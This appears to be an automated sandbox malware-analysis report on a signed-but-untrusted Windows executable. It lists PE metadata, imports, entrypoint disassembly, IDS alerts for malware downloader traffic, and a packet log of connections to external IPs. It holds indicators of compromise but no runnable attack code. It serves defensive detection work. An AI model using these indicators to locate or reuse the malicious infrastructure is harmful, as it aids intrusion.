File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.j........PE..L....f.R.................`.........X3.......p....@

File Icon


Icon Hash:	293cc0c898b02800

Static PE Info

General

Entrypoint:	0x403358
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e221f4f7d36469d53810a4b5f9fc8966

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Frotteredes kampevnes ", O=Modemer, L=Paris 08, S=\xcele-de-France, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	04/11/2023 01:24:18 03/11/2026 01:24:18
Subject Chain	CN="Frotteredes kampevnes ", O=Modemer, L=Paris 08, S=\xcele-de-France, C=FR
Version:	3
Thumbprint MD5:	737D86814BEB720E85B27394B61A90C9
Thumbprint SHA-1:	7D1ACAD7FCAE22D705668532FF5C60798305C558
Thumbprint SHA-256:	E10B0B713A976A4B51A2E3B3BA657097A04BFC2671A3707BB0D07444CF436A8F
Serial:	70ED4E79F70550682878F98B0AB23E3E807FBDFE

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+14h], ebp
mov dword ptr [esp+10h], 00409230h
mov dword ptr [esp+1Ch], ebp
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070BCh]
push ebp
call dword ptr [004072ACh]
push 00000008h
mov dword ptr [00429298h], eax
call 00007FE1C087A6ACh
mov dword ptr [004291E4h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 00420690h
call dword ptr [0040717Ch]
push 0040937Ch
push 004281E0h
call 00007FE1C087A317h
call dword ptr [00407134h]
mov ebx, 00434000h
push eax
push ebx
call 00007FE1C087A305h
push ebp
call dword ptr [0040710Ch]
cmp word ptr [00434000h], 0022h
mov dword ptr [004291E0h], eax
mov eax, ebx
jne 00007FE1C08777FAh
push 00000022h
mov eax, 00434002h
pop esi
push esi
push eax
call 00007FE1C0879D56h
push eax
call dword ptr [00407240h]
mov dword ptr [esp+18h], eax
jmp 00007FE1C08778BEh
push 00000020h
pop edx
cmp cx, dx
jne 00007FE1C08777F9h
inc eax
inc eax
cmp word ptr [eax], dx
je 00007FE1C08777EBh
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7494	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x48000	0x55918	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd4ef8	0x17a8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e66	0x6000	e8f12472e91b02deb619070e6ee7f1f4	False	0.6566569010416666	data	6.419409887460116	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1354	0x1400	2222fe44ebbadbc32af32dfc9c88e48e	False	0.4306640625	data	5.037511188789184	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x202d8	0x600	a5ec1b720d350c6303a7aba8d85072bf	False	0.4733072916666667	data	3.7600484096214832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x1e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x48000	0x55918	0x55a00	3d6a8b72f49b497aa2f6e828f36e2071	False	0.6818487682481752	data	6.750089044557724	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x486e8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.48516798769667574
RT_ICON	0x58f10	0x104d3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.0004043671653862
RT_ICON	0x693e8	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.5461162497372294
RT_ICON	0x72890	0x6b94	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States	0.995279593318809
RT_ICON	0x79428	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.5835951940850277
RT_ICON	0x7e8b0	0x4c28	Device independent bitmap graphic, 128 x 256 x 8, image size 16384	English	United States	0.46250512925728354
RT_ICON	0x834d8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.5978979688238073
RT_ICON	0x87700	0x2d6f	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States	0.9944114865445791
RT_ICON	0x8a470	0x2ca8	Device independent bitmap graphic, 96 x 192 x 8, image size 9216	English	United States	0.5530090972708187
RT_ICON	0x8d118	0x2868	Device independent bitmap graphic, 128 x 256 x 4, image size 8192	English	United States	0.31254833720030933
RT_ICON	0x8f980	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.6519709543568465
RT_ICON	0x91f28	0x1bc8	Device independent bitmap graphic, 72 x 144 x 8, image size 5184	English	United States	0.6259842519685039
RT_ICON	0x93af0	0x16e8	Device independent bitmap graphic, 96 x 192 x 4, image size 4608	English	United States	0.3922237380627558
RT_ICON	0x951d8	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096	English	United States	0.68688293370945
RT_ICON	0x96800	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.7211538461538461
RT_ICON	0x978a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304	English	United States	0.7316098081023454
RT_ICON	0x98750	0xde8	Device independent bitmap graphic, 72 x 144 x 4, image size 2592	English	United States	0.4393258426966292
RT_ICON	0x99538	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.5041291291291291
RT_ICON	0x99fa0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.7872950819672131
RT_ICON	0x9a928	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024	English	United States	0.8375451263537906
RT_ICON	0x9b1d0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576	English	United States	0.875
RT_ICON	0x9b898	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.5682926829268292
RT_ICON	0x9bf00	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256	English	United States	0.7890173410404624
RT_ICON	0x9c468	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8625886524822695
RT_ICON	0x9c8d0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.7204301075268817
RT_ICON	0x9cbb8	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States	0.805327868852459
RT_ICON	0x9cda0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.8040540540540541
RT_DIALOG	0x9cec8	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x9cfe8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x9d108	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x9d1d0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x9d230	0x180	Targa image data - Map 32 x 1235 x 1 +1	English	United States	0.5442708333333334
RT_VERSION	0x9d3b0	0x260	data	English	United States	0.5263157894736842
RT_MANIFEST	0x9d610	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T10:13:50.435466+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	59958	52.165.165.26	192.168.2.5
2024-07-25T10:13:56.708885+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	59960	80	192.168.2.5	132.226.247.73
2024-07-25T10:13:57.311360+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	59962	443	192.168.2.5	188.114.97.3
2024-07-25T10:13:53.606674+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	59959	443	192.168.2.5	108.167.181.251
2024-07-25T10:13:59.599663+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	59965	80	192.168.2.5	132.226.247.73
2024-07-25T10:13:22.527029+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49706	52.165.165.26	192.168.2.5
2024-07-25T10:13:58.302622+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	59963	80	192.168.2.5	132.226.247.73
2024-07-25T10:13:55.099487+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	59960	80	192.168.2.5	132.226.247.73

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 10:13:52.877051115 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:52.877109051 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:52.877201080 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:52.887154102 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:52.887192011 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.419739008 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.419868946 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.468055010 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.468085051 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.469166040 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.469239950 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.473808050 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.516498089 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.606771946 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.606834888 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.606863976 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.606877089 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.606930017 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.606971025 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.619479895 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.619610071 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.692306995 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.692553997 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.700710058 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.700820923 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.705749035 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.705823898 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.711658001 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.711729050 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.782490969 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.782633066 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.787026882 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.787101984 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.791909933 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.791985989 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.797642946 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.797745943 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.799637079 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.799707890 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.803194046 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.803270102 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.806737900 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.806806087 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.811366081 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.811443090 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.876174927 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.876262903 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.879324913 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.879398108 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.881556988 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.881618977 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.881629944 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.881710052 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.881757975 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.895852089 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.895874977 CEST	443	59959	108.167.181.251	192.168.2.5
Jul 25, 2024 10:13:53.895886898 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:53.899101973 CEST	59959	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:13:54.153666019 CEST	59960	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:54.158588886 CEST	80	59960	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:54.159122944 CEST	59960	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:54.159282923 CEST	59960	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:54.164932966 CEST	80	59960	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:54.835649014 CEST	80	59960	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:54.840125084 CEST	59960	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:54.846110106 CEST	80	59960	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:55.047537088 CEST	80	59960	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:55.099487066 CEST	59960	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:55.814357042 CEST	59961	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:55.814398050 CEST	443	59961	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:55.816509962 CEST	59961	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:55.816509962 CEST	59961	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:55.816551924 CEST	443	59961	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:56.294677019 CEST	443	59961	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:56.294764042 CEST	59961	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:56.299112082 CEST	59961	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:56.299124002 CEST	443	59961	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:56.299412966 CEST	443	59961	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:56.305948019 CEST	59961	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:56.348506927 CEST	443	59961	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:56.429713011 CEST	443	59961	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:56.429824114 CEST	443	59961	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:56.429940939 CEST	59961	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:56.436502934 CEST	59961	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:56.445100069 CEST	59960	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:56.450304031 CEST	80	59960	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:56.655008078 CEST	80	59960	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:56.657886982 CEST	59962	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:56.657917976 CEST	443	59962	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:56.658282995 CEST	59962	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:56.658282995 CEST	59962	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:56.658309937 CEST	443	59962	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:56.708884954 CEST	59960	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:57.170716047 CEST	443	59962	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:57.175082922 CEST	59962	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:57.175102949 CEST	443	59962	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:57.311369896 CEST	443	59962	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:57.311465979 CEST	443	59962	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:57.311635971 CEST	59962	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:57.312243938 CEST	59962	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:57.348191977 CEST	59960	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:57.349436045 CEST	59963	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:57.577461958 CEST	80	59963	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:57.577493906 CEST	80	59960	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:57.577545881 CEST	59963	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:57.577584028 CEST	59960	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:57.577697992 CEST	59963	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:57.584144115 CEST	80	59963	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:58.249696016 CEST	80	59963	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:58.251043081 CEST	59964	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:58.251080990 CEST	443	59964	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:58.251213074 CEST	59964	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:58.251509905 CEST	59964	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:58.251529932 CEST	443	59964	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:58.302622080 CEST	59963	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:58.712469101 CEST	443	59964	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:58.714042902 CEST	59964	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:58.714066029 CEST	443	59964	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:58.860058069 CEST	443	59964	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:58.860151052 CEST	443	59964	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:58.860503912 CEST	59964	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:58.860771894 CEST	59964	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:58.863718987 CEST	59963	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:58.864912033 CEST	59965	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:58.869600058 CEST	80	59963	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:58.869668961 CEST	59963	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:58.869951963 CEST	80	59965	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:58.870014906 CEST	59965	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:58.870138884 CEST	59965	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:13:58.875057936 CEST	80	59965	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:59.547147989 CEST	80	59965	132.226.247.73	192.168.2.5
Jul 25, 2024 10:13:59.548285961 CEST	59966	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:59.548317909 CEST	443	59966	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:59.548383951 CEST	59966	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:59.548666954 CEST	59966	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:13:59.548675060 CEST	443	59966	188.114.97.3	192.168.2.5
Jul 25, 2024 10:13:59.599663019 CEST	59965	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:00.043729067 CEST	443	59966	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:00.047185898 CEST	59966	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:00.047204018 CEST	443	59966	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:00.198414087 CEST	443	59966	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:00.198498964 CEST	443	59966	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:00.198545933 CEST	59966	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:00.199012041 CEST	59966	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:00.203188896 CEST	59967	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:00.212183952 CEST	80	59967	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:00.212280035 CEST	59967	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:00.212385893 CEST	59967	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:00.217685938 CEST	80	59967	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:00.907155991 CEST	80	59967	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:00.908579111 CEST	59968	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:00.908618927 CEST	443	59968	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:00.908898115 CEST	59968	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:00.908996105 CEST	59968	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:00.909004927 CEST	443	59968	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:00.958873034 CEST	59967	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:01.410805941 CEST	443	59968	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:01.412528992 CEST	59968	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:01.412542105 CEST	443	59968	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:01.559304953 CEST	443	59968	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:01.559392929 CEST	443	59968	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:01.559803009 CEST	59968	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:01.560503006 CEST	59968	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:01.590564966 CEST	59967	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:01.591660976 CEST	59969	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:01.597202063 CEST	80	59967	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:01.597263098 CEST	80	59969	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:01.597280979 CEST	59967	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:01.597400904 CEST	59969	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:01.597402096 CEST	59969	80	192.168.2.5	132.226.247.73
Jul 25, 2024 10:14:01.602193117 CEST	80	59969	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:02.307203054 CEST	80	59969	132.226.247.73	192.168.2.5
Jul 25, 2024 10:14:02.308463097 CEST	59970	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:02.308576107 CEST	443	59970	188.114.97.3	192.168.2.5
Jul 25, 2024 10:14:02.308659077 CEST	59970	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:14:02.308934927 CEST	59970	443	192.168.2.5	188.114.97.3
